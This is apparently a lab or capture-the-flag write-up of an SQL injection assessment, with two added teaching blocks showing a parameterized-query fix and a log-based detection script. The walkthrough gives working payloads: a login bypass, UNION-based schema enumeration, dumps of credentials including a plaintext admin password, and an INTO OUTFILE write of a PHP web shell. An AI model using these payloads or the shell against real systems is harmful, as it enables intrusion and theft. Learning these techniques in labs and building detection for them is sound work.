Skill Assessment

Last updated 4 days ago

First I can see a login, so I try a basic SQLi -->

admin' or 1=1-- -

Then I can see a search panel and name info, so I test whether this field is vulnerable:

It is vulnerable. Now I try a UNION SELECT -->

ADAM' UNION SELECT 1,2,3,4,5-- -
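Why the five-column probe comes back in the results, and what a bound parameter changes, as an added example that is not part of the original write-up or the lab's code. It uses an in-memory SQLite table as a stand-in; the table name, column names and sample rows are assumptions, and only the five-column width and the probe string come from the page.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the search table. Table and column names are
    # hypothetical; only the five-column width comes from the write-up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE payment "
               "(id INTEGER, name TEXT, month TEXT, amount INTEGER, tax INTEGER)")
    db.executemany("INSERT INTO payment VALUES (?,?,?,?,?)",
                   [(1, "Adam", "January", 1200, 120),
                    (2, "Eve", "March", 900, 90)])
    return db

COLUMNS = "id, name, month, amount, tax"

def search_vulnerable(db, term):
    # Input is pasted into the SQL text: a quote in `term` closes the string
    # literal and everything after it is parsed as SQL.
    sql = f"SELECT {COLUMNS} FROM payment WHERE name LIKE '%{term}%'"
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # The statement text is fixed and `term` is bound as a value, so it is
    # only ever compared as data. LIKE wildcards in the input are escaped.
    escaped = (term.replace("\\", "\\\\")
                   .replace("%", "\\%").replace("_", "\\_"))
    sql = f"SELECT {COLUMNS} FROM payment WHERE name LIKE ? ESCAPE '\\'"
    return db.execute(sql, (f"%{escaped}%",)).fetchall()

# Column-count probe quoted from the write-up.
PROBE = "ADAM' UNION SELECT 1,2,3,4,5-- -"

if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_parameterized):
        print(fn.__name__, "normal:", fn(db, "adam"))
        print(fn.__name__, "probe: ", fn(db, PROBE))
```

With the bound parameter the probe is just a name that matches no row, so the later enumeration and file-write queries have nothing to attach to.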

Nice try daddy, now I list secure_file_priv, to see if this field is vulnerable:

ADAM' UNION SELECT 1,2, variable_name, variable_value, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Now I try to upload a webshell -->

adam' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php'-- -

No problem, I will try to display the databases and the admin password to log in and do the upload

ADAM' UNION select 1,schema_name,3,4,5 from INFORMATION_SCHEMA.SCHEMATA-- -

I list all databases and see ilfreight and backup, nice. With database() I check which database this webapp is using:

ADAM' UNION select 1,database(),2,3,4-- -

NICE, now I list all tables, columns and info -->

ADAM' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4,5 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -
ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -

Now we can see all the content of these columns -->

ADAM' UNION select 1,2, username, password, 4 from ilfreight.users-- -

adam : 1be9f5d3a82847b8acca40544f953515

I try to log in again... but...

NO SURRENDER! I will try to enumerate the backup database

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

Now I list the columns:

ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -

Finally, I display all the data of these columns -->

ADAM' UNION select 1,2, username, password, 4 from backup.admin_bk-- -

admin : Inl@n3_fre1gh7_adm!n

NOW YEAAAHHH, but... it is the same user I have... sooooo.

There is something I am doing wrong... The response message above is: Permission Denied... Yeah... but... the query is this:

' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/shell.php'-- -

"Cant create to file in /var/www/html", but... I am in /dashboard/dashboard.php, so I try it -->

' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/dashboard/shell.php'-- -

NO ERROR!! I search for the file

HOLY SH1T!! I NEED SLEEP
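The stages of this walkthrough (login tautology, UNION probe, information_schema enumeration, INTO OUTFILE write) each leave a distinct trace in request logs. The following is an added detection example, not part of the original write-up; the log lines are constructed, and the paths, parameter names and the use of GET requests are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Stage signatures taken from the payload shapes in this write-up, ordered
# from most to least severe so the first match gives the label.
STAGES = [
    ("file_write",  re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("union_probe", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("tautology",   re.compile(r"'\s*or\s+1\s*=\s*1", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return the most severe SQLi stage seen in one access-log line, or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    # parse_qsl URL-decodes each value ('+' and %xx), which is the text the
    # database would receive if the parameter were concatenated into SQL.
    values = " ".join(v for _, v in parse_qsl(urlsplit(m.group(1)).query))
    for label, pattern in STAGES:
        if pattern.search(values):
            return label
    return None

# Constructed sample lines: documentation IP, hypothetical paths/parameters,
# and a placeholder "x" where the written file's content would be.
P = '203.0.113.7 - - [01/Jan/2025:10:00:0%d +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE_LOG = [
    P % (1, "/dashboard/dashboard.php?search=adam"),
    P % (2, "/dashboard/dashboard.php?search=ADAM%27+UNION+SELECT+1%2C2%2C3%2C4%2C5--+-"),
    P % (3, "/dashboard/dashboard.php?search=ADAM%27+UNION+select+1%2Cschema_name"
            "%2C3%2C4%2C5+from+INFORMATION_SCHEMA.SCHEMATA--+-"),
    P % (4, "/dashboard/dashboard.php?search=%27+union+select+%22%22%2C%22x%22%2C"
            "%22%22%2C%22%22%2C%22%22+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2F"
            "dashboard%2Fshell.php%27--+-"),
    P % (5, "/login.php?username=admin%27+or+1%3D1--+-&password=x"),
]

def scan(lines):
    """Return (line_number, stage) for every line that matches a stage."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, stage) for n, stage in hits if stage]

if __name__ == "__main__":
    for n, stage in scan(SAMPLE_LOG):
        print(f"line {n}: {stage}")
```

A file_write hit is the one to alert on immediately, since it means the database account holds the FILE privilege and the web root is writable by the database process.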
